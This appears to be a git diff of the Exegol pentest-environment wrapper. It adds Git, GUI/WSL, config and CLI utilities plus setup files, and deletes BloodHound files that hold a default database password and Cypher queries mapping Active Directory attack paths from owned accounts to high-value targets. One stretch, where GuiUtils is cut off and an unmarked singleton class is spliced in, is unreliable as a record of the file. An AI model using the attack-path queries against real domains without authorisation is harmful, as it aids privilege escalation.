test_git_dir.is_file(): + logger.debug("Git submodule repository detected") + self.__is_submodule = True + elif not test_git_dir.is_dir(): + raise ReferenceError + except ReferenceError: + if self.__git_name == "wrapper": + logger.warning("Exegol has not been installed via git clone. Skipping wrapper auto-update operation.") + if ConstantConfig.pip_installed: + logger.info("If you have installed Exegol with pip, check for an update with the command " + "[green]pip3 install exegol --upgrade[/green]") + abort_loading = True + # locally import git in case git is not installed of the system + try: + from git import Repo, Remote, InvalidGitRepositoryError, FetchInfo + except ModuleNotFoundError: + self.__git_disable = True + logger.debug("Git module is not installed.") + return + except ImportError: + self.__git_disable = True + logger.error("Unable to find git tool locally. Skipping git operations.") + return + self.__gitRepo: Optional[Repo] = None + self.__gitRemote: Optional[Remote] = None + self.__fetchBranchInfo: Optional[FetchInfo] = None + + if abort_loading: + return + logger.debug(f"Loading git at {self.__repo_path}") + try: + self.__gitRepo = Repo(self.__repo_path) + logger.debug(f"Repo path: {self.__gitRepo.git_dir}") + self.__init_repo(skip_submodule_update) + except InvalidGitRepositoryError as err: + logger.verbose(err) + logger.warning("Error while loading local git repository. 
Skipping all git operation.") + + def __init_repo(self, skip_submodule_update: bool = False): + self.isAvailable = True + assert self.__gitRepo is not None + logger.debug("Git repository successfully loaded") + if len(self.__gitRepo.remotes) > 0: + self.__gitRemote = self.__gitRepo.remotes['origin'] + else: + logger.warning("No remote git origin found on repository") + logger.debug(self.__gitRepo.remotes) + if not skip_submodule_update: + self.__initSubmodules() + + def clone(self, repo_url: str, optimize_disk_space: bool = True) -> bool: + if self.isAvailable: + logger.warning(f"The {self.getName()} repo is already cloned.") + return False + # locally import git in case git is not installed of the system + try: + from git import Repo, Remote, InvalidGitRepositoryError, FetchInfo + except ModuleNotFoundError: + logger.debug("Git module is not installed.") + return False + except ImportError: + logger.error(f"Unable to find git on your machine. The {self.getName()} repository cannot be cloned.") + logger.warning("Please install git to support this feature.") + return False + custom_options = [] + if optimize_disk_space: + custom_options.append('--depth=1') + # TODO add progress bar via TUI + from git import GitCommandError + try: + with console.status(f"Downloading {self.getName()} git repository", spinner_style="blue"): + self.__gitRepo = Repo.clone_from(repo_url, str(self.__repo_path), multi_options=custom_options) + except GitCommandError as e: + # GitPython user \n only + error = GitUtils.formatStderr(e.stderr) + logger.error(f"Unable to clone the git repository. 
{error}") + return False + self.__init_repo() + return True + + def getCurrentBranch(self) -> Optional[str]: + """Get current git branch name""" + if not self.isAvailable: + return None + assert self.__gitRepo is not None + try: + return str(self.__gitRepo.active_branch) + except TypeError: + logger.debug("Git HEAD is detached, cant find the current branch.") + return None + except ValueError: + logger.error(f"Unable to find current git branch in the {self.__git_name} repository. Check the path in the .git file from {self.__repo_path / '.git'}") + return None + + def listBranch(self) -> List[str]: + """Return a list of str of all remote git branch available""" + assert self.isAvailable + result: List[str] = [] + if self.__gitRemote is None: + return result + for branch in self.__gitRemote.fetch(): + branch_parts = branch.name.split('/') + if len(branch_parts) < 2: + logger.warning(f"Branch name is not correct: {branch.name}") + result.append(branch.name) + else: + result.append(branch_parts[1]) + return result + + def safeCheck(self) -> bool: + """Check the status of the local git repository, + if there is pending change it is not safe to apply some operations""" + assert self.isAvailable + if self.__gitRepo is None or self.__gitRemote is None: + return False + # Submodule changes must be ignored to update the submodules sources independently of the wrapper + is_dirty = self.__gitRepo.is_dirty(submodules=False) + if is_dirty: + logger.warning("Local git have unsaved change. Skipping source update.") + return not is_dirty + + def isUpToDate(self, branch: Optional[str] = None) -> bool: + """Check if the local git repository is up-to-date. + This method compare the last commit local and the ancestor.""" + assert self.isAvailable + if branch is None: + branch = self.getCurrentBranch() + if branch is None: + logger.warning("No branch is currently attached to the git repository. 
The up-to-date status cannot be checked.") + return False + assert self.__gitRepo is not None + assert self.__gitRemote is not None + # Get last local commit + current_commit = self.__gitRepo.heads[branch].commit + # Get last remote commit + fetch_result = self.__gitRemote.fetch() + try: + self.__fetchBranchInfo = fetch_result[f'{self.__gitRemote}/{branch}'] + except IndexError: + logger.warning("The selected branch is local and cannot be updated.") + return True + + logger.debug(f"Fetch flags : {self.__fetchBranchInfo.flags}") + logger.debug(f"Fetch note : {self.__fetchBranchInfo.note}") + logger.debug(f"Fetch old commit : {self.__fetchBranchInfo.old_commit}") + logger.debug(f"Fetch remote path : {self.__fetchBranchInfo.remote_ref_path}") + from git import FetchInfo + # Bit check to detect flags info + if self.__fetchBranchInfo.flags & FetchInfo.HEAD_UPTODATE != 0: + logger.debug("HEAD UP TO DATE flag detected") + if self.__fetchBranchInfo.flags & FetchInfo.FAST_FORWARD != 0: + logger.debug("FAST FORWARD flag detected") + if self.__fetchBranchInfo.flags & FetchInfo.ERROR != 0: + logger.debug("ERROR flag detected") + if self.__fetchBranchInfo.flags & FetchInfo.FORCED_UPDATE != 0: + logger.debug("FORCED_UPDATE flag detected") + if self.__fetchBranchInfo.flags & FetchInfo.REJECTED != 0: + logger.debug("REJECTED flag detected") + if self.__fetchBranchInfo.flags & FetchInfo.NEW_TAG != 0: + logger.debug("NEW TAG flag detected") + + remote_commit = self.__fetchBranchInfo.commit + # Check if remote_commit is an ancestor of the last local commit (check if there is local commit ahead) + return self.__gitRepo.is_ancestor(remote_commit, current_commit) + + def update(self) -> bool: + """Update local git repository within current branch""" + assert self.isAvailable + if not self.safeCheck(): + return False + # Check if the git branch status is not detached + if self.getCurrentBranch() is None: + return False + if self.isUpToDate(): + logger.success(f"Git branch 
[green]{self.getCurrentBranch()}[/green] is already up-to-date.") + return False + if self.__gitRemote is not None: + logger.info(f"Using branch [green]{self.getCurrentBranch()}[/green] on {self.getName()} repository") + with console.status(f"Updating git [green]{self.getName()}[/green]", spinner_style="blue"): + self.__gitRemote.pull(refspec=self.getCurrentBranch()) + logger.success("Git successfully updated") + return True + return False + + def __initSubmodules(self): + """Init (and update git object not source code) git sub repositories (only depth=1)""" + logger.verbose(f"Git {self.getName()} init submodules") + # These module are init / updated manually + blacklist_heavy_modules = ["exegol-resources"] + # Submodules dont have depth submodule limits + depth_limit = not self.__is_submodule + with console.status(f"Initialization of git submodules", spinner_style="blue") as s: + try: + submodules = self.__gitRepo.iter_submodules() + except ValueError: + logger.error(f"Unable to find any git submodule from '{self.getName()}' repository. Check the path in the file {self.__repo_path / '.git'}") + return + for subm in submodules: + # Submodule update are skipped if blacklisted or if the depth limit is set + if subm.name in blacklist_heavy_modules or \ + (depth_limit and ('/' in subm.name or '\\' in subm.name)): + continue + s.update(status=f"Downloading git submodules [green]{subm.name}[/green]") + from git.exc import GitCommandError + try: + subm.update(recursive=True) + except GitCommandError as e: + error = GitUtils.formatStderr(e.stderr) + logger.debug(f"Unable tu update git submodule {subm.name}: {e}") + if "unable to access" in error: + logger.error("You don't have internet to update git submodule. Skipping operation.") + else: + logger.error("Unable to update git submodule. Skipping operation.") + logger.error(error) + except ValueError: + logger.error(f"Unable to update git submodule '{subm.name}'. 
Check the path in the file '{Path(subm.path) / '.git'}'") + + def submoduleSourceUpdate(self, name: str) -> bool: + """Update source code from the 'name' git submodule""" + if not self.isAvailable: + return False + assert self.__gitRepo is not None + try: + submodule = self.__gitRepo.submodule(name) + except ValueError: + logger.debug(f"Git submodule '{name}' not found.") + return False + from git.exc import RepositoryDirtyError + try: + from git.exc import GitCommandError + try: + # TODO add TUI progress + with console.status(f"Downloading submodule [green]{name}[/green]", spinner_style="blue"): + submodule.update(to_latest_revision=True) + except GitCommandError as e: + logger.debug(f"Unable tu update git submodule {name}: {e}") + if "unable to access" in e.stderr: + logger.error("You don't have internet to update git submodule. Skipping operation.") + else: + logger.error("Unable to update git submodule. Skipping operation.") + logger.error(e.stderr) + return False + logger.success(f"Submodule [green]{name}[/green] successfully updated.") + return True + except RepositoryDirtyError: + logger.warning(f"Submodule {name} cannot be updated automatically as long as there are local modifications.") + logger.error("Aborting git submodule update.") + logger.empty_line() + return False + + def checkout(self, branch: str) -> bool: + """Change local git branch""" + assert self.isAvailable + if not self.safeCheck(): + return False + if branch == self.getCurrentBranch(): + logger.warning(f"Branch '{branch}' is already the current branch") + return False + assert self.__gitRepo is not None + from git.exc import GitCommandError + try: + # If git local branch didn't exist, change HEAD to the origin branch and create a new local branch + if branch not in self.__gitRepo.heads: + self.__gitRepo.references['origin/' + branch].checkout() + self.__gitRepo.create_head(branch) + self.__gitRepo.heads[branch].checkout() + except GitCommandError as e: + logger.error("Unable to checkout to 
the selected branch. Skipping operation.") + logger.debug(e) + return False + except IndexError as e: + logger.error("Unable to find the selected branch. Skipping operation.") + logger.debug(e) + return False + logger.success(f"Git successfully checkout to '{branch}'") + return True + + def getTextStatus(self) -> str: + """Get text status from git object for rich print.""" + if self.isAvailable: + from git.exc import GitCommandError + try: + if self.isUpToDate(): + result = "[green]Up to date[/green]" + else: + result = "[orange3]Update available[/orange3]" + except GitCommandError: + # Offline error catch + result = "[green]Installed[/green] [bright_black](offline)[/bright_black]" + else: + if self.__git_disable: + result = "[red]Missing dependencies[/red]" + elif self.__git_name == ["wrapper", "images"] and \ + (ConstantConfig.pip_installed or not ConstantConfig.git_source_installation): + result = "[bright_black]Auto-update not supported[/bright_black]" + else: + result = "[bright_black]Not installed[/bright_black]" + return result + + def getName(self) -> str: + """Git name getter""" + return self.__git_name + + def getSubject(self) -> str: + """Git subject getter""" + return self.__git_subject + + def isSubModule(self) -> bool: + """Git submodule status getter""" + return self.__is_submodule + + @classmethod + def formatStderr(cls, stderr): + return stderr.replace('\n', '').replace('stderr:', '').strip().strip("'") + + def __repr__(self) -> str: + """Developer debug object representation""" + return f"GitUtils '{self.__git_name}': {'Active' if self.isAvailable else 'Disable'}" diff --git a/exegol/utils/GuiUtils.py b/exegol/utils/GuiUtils.py new file mode 100644 index 00000000..e8b818fb --- /dev/null +++ b/exegol/utils/GuiUtils.py @@ -0,0 +1,228 @@ +import io +import os +import shutil +import subprocess +import time +from typing import Optional + +from exegol.console.ExegolPrompt import Confirm +from exegol.utils.EnvInfo import EnvInfo +from exegol.utils.ExeLog 
import logger, console + + +class GuiUtils: + """This utility class allows determining if the current system supports the GUI + from the information of the system.""" + + __distro_name = "" + + @classmethod + def isGuiAvailable(cls) -> bool: + """ + Check if the host OS can support GUI application with X11 sharing + :return: bool + """ + # GUI was not supported on Windows before WSLg + if EnvInfo.isWindowsHost(): + logger.debug("Testing WSLg availability") + # WSL + WSLg must be available on the Windows host for the GUI to work + if not cls.__wsl_available(): + logger.error("WSL is [orange3]not available[/orange3] on your system. GUI is not supported.") + return False + # Only WSL2 support WSLg + if EnvInfo.getDockerEngine() != "wsl2": + logger.error("Docker must be run with [orange3]WSL2[/orange3] engine in order to support GUI applications.") + return False + logger.debug("WSL is [green]available[/green] and docker is using WSL2") + if cls.__wslg_installed(): + # X11 GUI socket can only be shared from a WSL (to find WSLg mount point) + if EnvInfo.current_platform != "WSL": + cls.__distro_name = cls.__find_wsl_distro() + # If no WSL is found, propose to continue without GUI + if not cls.__distro_name and not Confirm( + "Do you want to continue [orange3]without[/orange3] GUI support ?", default=True): + raise KeyboardInterrupt + return True + elif cls.__wslg_eligible(): + logger.info("[green]WSLg[/green] is available on your system but [orange3]not installed[/orange3].") + logger.info("Make sure, [green]WSLg[/green] is installed on your Windows by running 'wsl --update' as [orange3]admin[/orange3].") + return True + logger.debug("WSLg is [orange3]not available[/orange3]") + logger.warning( + "Display sharing is [orange3]not supported[/orange3] on your version of Windows. 
You need to upgrade to [turquoise2]Windows 11[/turquoise2].") + return False + # TODO check mac compatibility (default: same as linux) + return True + + @classmethod + def getX11SocketPath(cls) -> str: + """ + Get the host path of the X11 socket + :return: + """ + if cls.__distro_name: + return f"\\\\wsl.localhost\\{cls.__distro_name}\\mnt\\wslg\\.X11-unix" + return "/tmp/.X11-unix" + + @classmethod + def getDisplayEnv(cls) -> str: + """ + Get the current DISPLAY env to access X11 socket + :return: + """ + return os.getenv('DISPLAY', ":0") + + @staticmethod + def __wsl_test(path, name: Optional[str] = "docker-desktop") -> bool: + """ + Check presence of a file in the WSL docker-desktop image. + the targeted WSL image can be changed with 'name' parameter. + If name is None, the default WSL image will be use. + """ + if EnvInfo.isWindowsHost(): + wsl = shutil.which("wsl.exe") + if not wsl: + return False + if name is None: + ret = subprocess.run(["wsl.exe", "test", "-f", path]) + else: + ret = subprocess.run(["wsl.exe", "-d", name, "test", "-f", path]) + return ret.returncode == 0 + return False + + @classmethod + def __check_wsl_docker_integration(cls, distrib_name) -> bool: + """ + Check the presence of the docker binary in the supplied WSL distribution. + This test allows checking if docker integration is enabled. + """ + return cls.__wsl_test("/usr/bin/docker", distrib_name) + + @classmethod + def __wsl_available(cls) -> bool: + """ + heuristic to detect if Windows Subsystem for Linux is available. + + Uses presence of /etc/os-release in the WSL image to say Linux is there. + This is a de facto file standard across Linux distros. + """ + return cls.__wsl_test("/etc/os-release", name=None) + + @classmethod + def __wslg_installed(cls) -> bool: + """ + Check if WSLg is installed and deploy inside a WSL image by testing if the file wslg/versions.txt exist. 
+ :return: bool + """ + return cls.__wsl_test("/mnt/host/wslg/versions.txt") or cls.__wsl_test("/mnt/wslg/versions.txt", name=None) + + @staticmethod + def __wslg_eligible() -> bool: + """ + Check if the current Windows version support WSLg + :return: + """ + try: + os_version_raw, _, build_number_raw = EnvInfo.getWindowsRelease().split('.')[:3] + except ValueError: + logger.debug(f"Impossible to find the version of windows: '{EnvInfo.getWindowsRelease()}'") + logger.error("Exegol can't know if your [orange3]version of Windows[/orange3] can support dockerized GUIs.") + return False + # Available from Windows 10 Build 21364 + # Available from Windows 11 Build 22000 + os_version = int(os_version_raw) + build_number = int(build_number_raw) + if os_version == 10 and build_number >= 21364: + return True + elif os_version > 10: + return True + return False + + @classmethod + def __find_wsl_distro(cls) -> str: + distro_name = "" + # these distros cannot be used to load WSLg socket + blacklisted_distro = ["docker-desktop", "docker-desktop-data"] + ret = subprocess.Popen(["C:\Windows\system32\wsl.exe", "-l"], stdout=subprocess.PIPE, stderr=subprocess.PIPE) + # Wait for WSL process to end + ret.wait() + if ret.returncode == 0: + skip_header = True + # parse distribs + logger.debug("Found WSL distribution:") + assert ret.stdout is not None + for line in io.TextIOWrapper(ret.stdout, encoding="utf-16le"): + # Skip WSL text header + if skip_header: + skip_header = False + continue + # Remove newline + line = line.strip() + # Skip if line is empty + if not line: + continue + # Remove default text message + name = line.split()[0] + logger.debug(f"- {name}") + # Skip blacklisted WSL + if name not in blacklisted_distro: + eligible = True + # Test if the current WSL has docker integration activated + while not cls.__check_wsl_docker_integration(name): + eligible = False + logger.warning( + f"The '{name}' WSL distribution could be used to [green]enable the GUI[/green] on exegol but 
the docker integration is [orange3]not enabled[/orange3].") + if not Confirm( + f"Do you want to [red]manually[/red] enable docker integration for WSL '{name}'?", + default=True): + break + eligible = True + if eligible: + distro_name = name + break + if distro_name: + logger.verbose(f"Wsl '{distro_name}' distribution found, the WSLg service can be mounted in exegol.") + else: + logger.warning( + "No WSL distribution was found on your machine. At least one distribution must be available to allow Exegol to use WSLg.") + if Confirm("Do you want Exegol to install one automatically (Ubuntu)?", default=True): + if cls.__create_default_wsl(): + distro_name = "Ubuntu" + else: + assert ret.stderr is not None + logger.error( + f"Error while loading existing wsl distributions. {ret.stderr.read().decode('utf-16le')} (code: {ret.returncode})") + return distro_name + + @classmethod + def __create_default_wsl(cls) -> bool: + logger.info("Creating Ubuntu WSL distribution. Please wait.") + ret = subprocess.Popen(["C:\Windows\system32\wsl.exe", "--install", "-d", "Ubuntu"], stderr=subprocess.PIPE) + ret.wait() + logger.info("Please follow installation instructions on the new window.") + if ret.returncode != 0: + assert ret.stderr is not None + logger.error( + f"Error while install WSL Ubuntu: {ret.stderr.read().decode('utf-16le')} (code: {ret.returncode})") + return False + else: + while not Confirm("Is the installation of Ubuntu [green]finished[/green]?", default=True): + pass + logger.verbose("Set WSL Ubuntu as default to enable docker integration") + # Set new WSL distribution as default to start it and enable docker integration + ret = subprocess.Popen(["C:\Windows\system32\wsl.exe", "-s", "Ubuntu"], stderr=subprocess.PIPE) + ret.wait() + # Wait for the docker integration (10 try, 1 sec apart) + with console.status("Waiting for the activation of the docker integration", spinner_style="blue"): + for _ in range(10): + if cls.__check_wsl_docker_integration("Ubuntu"): + break + 
# Generic singleton class
from typing import Dict


class MetaSingleton(type):
    """Metaclass turning every class that uses it into a lazy singleton.

    The first instantiation builds and memoizes the instance; every later
    call returns that same object."""
    __instances: Dict[type, object] = {}

    def __call__(cls, *args, **kwargs) -> object:
        """Return the unique instance of `cls`, creating it on first use."""
        registry = MetaSingleton.__instances
        try:
            # Fast path: the singleton already exists for this class
            return registry[cls]
        except KeyError:
            # First call: build the instance through the normal constructor chain
            registry[cls] = super(MetaSingleton, cls).__call__(*args, **kwargs)
            return registry[cls]
Path = self.__exegol_path / "workspaces" + self.shared_resources_path: str = str(self.__exegol_path / "my-resources") + self.exegol_resources_path: Path = self.__default_resource_location('exegol-resources') + + # process + self.__load_file() + + def __load_file(self): + if not self.__exegol_path.is_dir(): + logger.verbose(f"Creating exegol home folder: {self.__exegol_path}") + os.mkdir(self.__exegol_path) + if not self.__config_file_path.is_file(): + logger.verbose(f"Creating default exegol config: {self.__config_file_path}") + self.__create_config_file() + else: + self.__parse_config() + if self.__config_upgrade: + logger.verbose("Upgrading config file") + self.__create_config_file() + + def __create_config_file(self): + config = f"""# Exegol configuration + +# Volume path can be changed at any time but existing containers will not be affected by the update +volumes: + # The shared resources volume is a storage space dedicated to the user to customize his environment and tools. This volume can be shared across all exegol containers. + my_resources_path: {self.shared_resources_path} + + # Exegol resources are data and static tools downloaded in addition to docker images. These tools are complementary and are accessible directly from the host. 
+ exegol_resources_path: {self.exegol_resources_path} + + # When containers do not have an explicitly declared workspace, a dedicated folder will be created at this location to share the workspace with the host but also to save the data after deleting the container + private_workspace_path: {self.private_volume_path} +""" + # TODO handle default image selection + # TODO handle default start container + # TODO add custom build profiles path + # TODO add auto_remove flag True/False to remove outdated images + with open(self.__config_file_path, 'w') as file: + file.write(config) + + def __default_resource_location(self, folder_name: str) -> Path: + local_src = ConstantConfig.src_root_path_obj / folder_name + if local_src.is_dir(): + # If exegol is clone from github, exegol-resources submodule is accessible from root src + return local_src + else: + # Default path for pip installation + return self.__exegol_path / folder_name + + def __load_config_path(self, data: dict, config_name: str, default: Union[Path, str]) -> Union[Path, str]: + try: + result = data.get(config_name) + if result is None: + logger.debug(f"Config {config_name} has not been found in exegol config file. Config file will be upgrade.") + self.__config_upgrade = True + return default + return Path(result).expanduser() + except TypeError: + logger.error(f"Error while loading {config_name}! Using default config.") + return default + + def __parse_config(self): + with open(self.__config_file_path, 'r') as file: + try: + data: Dict = yaml.safe_load(file) + except yaml.parser.ParserError: + data = {} + logger.error("Error while parsing exegol config file ! 
Check for syntax error.") + # bug: logger verbosity not set at this time + logger.debug(data) + volumes_data = data.get("volumes", {}) + # Catch existing but empty section + if volumes_data is None: + volumes_data = {} + self.shared_resources_path = str(self.__load_config_path(volumes_data, 'my_resources_path', self.shared_resources_path)) + self.private_volume_path = self.__load_config_path(volumes_data, 'private_workspace_path', self.private_volume_path) + self.exegol_resources_path = self.__load_config_path(volumes_data, 'exegol_resources_path', self.exegol_resources_path) + + def get_configs(self) -> List[str]: + """User configs getter each options""" + configs = [ + f"Private workspace: [magenta]{self.private_volume_path}[/magenta]", + f"Exegol resources: [magenta]{self.exegol_resources_path}[/magenta]", + f"My resources: [magenta]{self.shared_resources_path}[/magenta]" + ] + # TUI can't be called from here to avoid circular importation + return configs diff --git a/exegol/utils/__init__.py b/exegol/utils/__init__.py new file mode 100644 index 00000000..e69de29b diff --git a/exegol/utils/argParse.py b/exegol/utils/argParse.py new file mode 100644 index 00000000..6b4ed53a --- /dev/null +++ b/exegol/utils/argParse.py @@ -0,0 +1,99 @@ +import argparse +from logging import CRITICAL +from typing import IO, Optional, List, Union, Dict, cast + +from exegol.console.cli.actions.Command import Command, Option +from exegol.utils.ExeLog import logger + + +class ExegolArgParse(argparse.ArgumentParser): + """Overloading of the main parsing (argparse.ArgumentParser) class""" + + # Using Exelog to print built-in parser message + def _print_message(self, message: str, file: Optional[IO[str]] = None) -> None: + if message: + logger.raw(message, level=CRITICAL, rich_parsing=True) + + +class Parser: + """Custom Exegol CLI Parser. Main controller of argument building and parsing.""" + + __description = "This Python script is a wrapper for Exegol. 
It can be used to easily manage Exegol on " \ + "your machine." + __formatter_class: type = argparse.RawTextHelpFormatter + + def __init__(self, actions: List[Command]): + """Custom parser creation""" + # Defines every actions available + self.__actions: List[Command] = actions + # Create & init root parser + self.__root_parser: ExegolArgParse + self.__init_parser() + # Configure root options + # (WARNING: these parameters are duplicate with every sub-parse, cannot use positional args here) + self.__set_options(self.__root_parser, Command()) # Add global arguments from Command to the root parser + # Create & fill sub-parser + self.subParser = self.__root_parser.add_subparsers(help="Description of the actions") + self.__set_action_parser() + + def __init_parser(self) -> None: + """Root parser creation""" + + self.__root_parser = ExegolArgParse( + description=self.__description, + epilog=Command().formatEpilog(), + formatter_class=self.__formatter_class, + ) + + def __set_action_parser(self) -> None: + """Create sub-parser for each action and configure it""" + self.__root_parser._positionals.title = "[green]Required arguments[/green]" + for action in self.__actions: + # Each action has a dedicated sub-parser with different options + # the 'help' description of the current action is retrieved + # from the comment of the corresponding action class + sub_parser = self.subParser.add_parser(action.name, help=action.__doc__, + description=action.__doc__, + epilog=action.formatEpilog(), + formatter_class=self.__formatter_class) + sub_parser.set_defaults(action=action) + self.__set_options(sub_parser, target=action) + + def __set_options(self, sub_parser: argparse.ArgumentParser, target: Optional[Command] = None) -> None: + """Add different groups and parameters/options in the current sub_parser""" + global_set = False # Only one group can be global at the time + # Load actions to be processed (default: every action from cls) + actions_list = [target] if target else 
self.__actions + for action in actions_list: + # On each action, fetch every group to be processed + for argument_group in action.groupArgs: + group_parser: argparse._ActionsContainer + if argument_group.is_global and not global_set: + # If the current group is global (ex: 'Optional arguments'), + # overwriting parser main group before adding custom parameters + global_set = True # The setup application should be run only once + sub_parser._optionals.title = argument_group.title # Overwriting default argparse title + group_parser = sub_parser # Subparser is directly used to add arguments + else: + # In every other case, a dedicated group is created in the parser + group_parser = sub_parser.add_argument_group(argument_group.title, + description=argument_group.description) + # once the group is created in the parser, the arguments can be added to it + option: Dict[str, Union[Option, bool]] + for option in argument_group.options: + try: + # Retrieve Option object from the Dict + assert type(option["arg"]) is Option + argument = cast(Option, option["arg"]) + # Add argument with its config to the parser + group_parser.add_argument(*argument.args, **argument.kwargs) + except argparse.ArgumentError: + continue + + def run_parser(self) -> argparse.Namespace: + """Execute argparse to retrieve user options from argv""" + return self.__root_parser.parse_args() + + def print_help(self): + """Force argparse to display the help message""" + self.__root_parser.print_help() diff --git a/requirements.txt b/requirements.txt index c3e4cd32..1a7e183b 100644 --- a/requirements.txt +++ b/requirements.txt @@ -1,9 +1,5 @@ -docker~=4.4.1 -requests~=2.23.0 -pandas~=1.0.5 -numpy==1.19.3 #temporary fix for issue #33: forced numpy version while this fix is not over: https://tinyurl.com/y3dm3h86 -tabulate~=0.8.2 -python-dateutil~=2.8.1 -rich~=9.8.2 -pyasn1~=0.4.8 -psutil~=5.7.2 \ No newline at end of file +docker~=5.0.3 +requests>=2.26.0 +rich~=11.2.0 +GitPython~=3.1.26 +PyYAML>=6.0 \ No 
newline at end of file diff --git a/setup.py b/setup.py new file mode 100644 index 00000000..3e54b0dd --- /dev/null +++ b/setup.py @@ -0,0 +1,75 @@ +import pathlib + +from setuptools import setup, find_packages + +from exegol import __version__ + +here = pathlib.Path(__file__).parent.resolve() + +# Get the long description from the README file +long_description = (here / 'README.md').read_text(encoding='utf-8') + +# Additional non-code data used by Exegol to build local docker image from source +source_directory = "exegol-docker-build" +data_files_dict = {source_directory: [f"{source_directory}/Dockerfile"] + [str(profile) for profile in pathlib.Path(source_directory).rglob('*.dockerfile')]} +data_files = [] +# Add sources files recursively +for path in pathlib.Path(f'{source_directory}/sources').rglob('*'): + # Exclude directory path and exclude dockerhub hooks files + if path.is_dir() or path.parent.name == "hooks": + continue + key = str(path.parent) + if data_files_dict.get(key) is None: + data_files_dict[key] = [] + data_files_dict[key].append(str(path)) +# Dict to tuple +for k, v in data_files_dict.items(): + data_files.append((k, v)) + +setup( + name='Exegol', + version=__version__, + license='GNU (GPLv3)', + author="Shutdown & Dramelac", + author_email='nwodtuhs@pm.me', + description='Python wrapper to use Exegol, a container based fully featured and community-driven hacking environment.', + long_description=long_description, + long_description_content_type='text/markdown', + python_requires='>=3.6, <4', + url='https://github.com/ShutdownRepo/Exegol', + keywords='pentest redteam ctf exegol', + classifiers=[ + 'Development Status :: 5 - Production/Stable', + "Programming Language :: Python :: 3.6", + "Programming Language :: Python :: 3.7", + "Programming Language :: Python :: 3.8", + "Programming Language :: Python :: 3.9", + "Programming Language :: Python :: 3.10", + "License :: OSI Approved :: GNU General Public License v3 (GPLv3)", + "Operating System 
:: OS Independent", + ], + install_requires=[ + 'docker~=5.0.3', + 'requests', + 'rich~=11.2.0', + 'PyYAML', + 'GitPython' + ], + packages=find_packages(exclude=["tests"]), + include_package_data=True, + data_files=data_files, + + entry_points={ + 'console_scripts': [ + 'exegol = exegol.manager.ExegolController:main', + ], + }, + + project_urls={ + 'Bug Reports': 'https://github.com/ShutdownRepo/Exegol/issues', + 'Source': 'https://github.com/ShutdownRepo/Exegol', + 'Documentation': 'https://github.com/ShutdownRepo/Exegol/blob/master/README.md', # TODO Create proper documentation + 'Funding': 'https://patreon.com/nwodtuhs', + }, + test_suite='tests' +) diff --git a/sources/bloodhound/config.json b/sources/bloodhound/config.json deleted file mode 100644 index 94fb7803..00000000 --- a/sources/bloodhound/config.json +++ /dev/null @@ -1,40 +0,0 @@ -{ - "performance": { - "edge": 5, - "lowGraphics": false, - "nodeLabels": 1, - "edgeLabels": 1, - "darkMode": true, - "debug": true - }, - "edgeincluded": { - "MemberOf": true, - "HasSession": true, - "AdminTo": true, - "AllExtendedRights": true, - "AddMember": true, - "ForceChangePassword": true, - "GenericAll": true, - "GenericWrite": true, - "Owns": true, - "WriteDacl": true, - "WriteOwner": true, - "CanRDP": true, - "ExecuteDCOM": true, - "AllowedToDelegate": true, - "ReadLAPSPassword": true, - "Contains": true, - "GpLink": true, - "AddAllowedToAct": true, - "AllowedToAct": true, - "SQLAdmin": true, - "ReadGMSAPassword": true, - "HasSIDHistory": true, - "CanPSRemote": true - }, - "databaseInfo": { - "url": "bolt://localhost:7687", - "user": "neo4j", - "password": "exegol4thewin" - } -} diff --git a/sources/bloodhound/customqueries.json b/sources/bloodhound/customqueries.json deleted file mode 100644 index 451bf54b..00000000 --- a/sources/bloodhound/customqueries.json +++ /dev/null @@ -1,703 +0,0 @@ -{ - "queries": [ - { - "name": "Owned objects", - "category": "Tigers love pepper", - "queryList": [{ - "final": true, - 
"query": "MATCH (m) WHERE m.owned=TRUE RETURN m" - }] - }, - { - "name": "Direct groups of owned users", - "category": "Tigers love pepper", - "queryList": [{ - "final": true, - "query": "MATCH (u:User {owned:true}), (g:Group), p=(u)-[:MemberOf]->(g) RETURN p", - "props": {}, - "allowCollapse": true - }] - }, - { - "name": "Unrolled groups of owned users", - "category": "Tigers love pepper", - "queryList": [{ - "final": true, - "query": "MATCH (m:User) WHERE m.owned=TRUE WITH m MATCH p=(m)-[:MemberOf*1..]->(n:Group) RETURN p" - }] - }, - { - "name": "Shortest paths from owned objects to High Value Targets (5 hops)", - "category": "Tigers love pepper", - "queryList": [{ - "final": true, - "query": "MATCH p=shortestPath((n {owned:true})-[:MemberOf|HasSession|AdminTo|AllExtendedRights|AddMember|ForceChangePassword|GenericAll|GenericWrite|Owns|WriteDacl|WriteOwner|CanRDP|ExecuteDCOM|AllowedToDelegate|ReadLAPSPassword|Contains|GpLink|AddAllowedToAct|AllowedToAct|SQLAdmin|ReadGMSAPassword|HasSIDHistory|CanPSRemote*1..5]->(m {highvalue:true})) WHERE NOT n=m RETURN p", - "allowCollapse": true - }] - }, - { - "name": "Most exploitable paths from owned objects to High Value Targets (5 hops)", - "category": "Tigers love pepper", - "queryList": [{ - "final": true, - "query": "MATCH p=allShortestPaths((n {owned:true})-[:MemberOf|AdminTo|AllExtendedRights|AddMember|ForceChangePassword|GenericAll|GenericWrite|Owns|WriteDacl|WriteOwner|ExecuteDCOM|AllowedToDelegate|ReadLAPSPassword|Contains|GpLink|AddAllowedToAct|AllowedToAct|SQLAdmin|ReadGMSAPassword|HasSIDHistory*1..5]->(m {highvalue:true})) WHERE NOT n=m RETURN p", - "allowCollapse": true - }] - }, - { - "name": "Next steps (5 hops) from owned objects", - "category": "Tigers love pepper", - "queryList": [{ - "final": true, - "query": "MATCH p=shortestPath((c {owned: true})-[*1..5]->(s)) WHERE NOT c = s RETURN p" - }] - }, - { - "name": "Next steps (3 hops) from owned objects", - "category": "Tigers love pepper", - "queryList": 
